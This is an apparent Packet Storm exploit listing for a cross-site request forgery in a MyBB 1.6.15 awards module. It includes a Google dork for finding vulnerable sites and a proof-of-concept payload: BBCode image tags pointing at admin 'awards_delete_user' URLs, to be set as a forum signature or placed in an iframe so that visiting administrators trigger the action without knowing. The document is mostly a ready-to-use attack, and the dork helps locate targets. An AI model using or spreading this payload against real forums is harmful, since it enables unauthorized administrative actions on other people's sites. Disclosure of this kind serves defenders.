MyBB 1.6.15 Cross Site Request Forgery

2014-08-22T00:00:00
ID PACKETSTORM:127992
Type packetstorm
Reporter Vagineer
Modified 2014-08-22T00:00:00

Description

                                        
                                            `# Google Dork: allinurl:myawards.php  
# Date: 08/17/2014  
# Exploit Author: Vagineer https://vagineering.me  
# Version: ALL VERSIONS  
# Tested on: MyBB 1.6.15  
  
PoC(set this as your signature or iframe it)  
Add awards  
[img]  
https://website.com/forum/admin/index.php?module=user-awards&action=awards_delete_user&id=1&awid=1&awuid=2  
[/img]  
Remove awards  
[img]  
https://website.com/forum/admin/index.php?module=user-awards&action=awards_delete_user&id=1&awuid=1  
[/img]  
  
  
`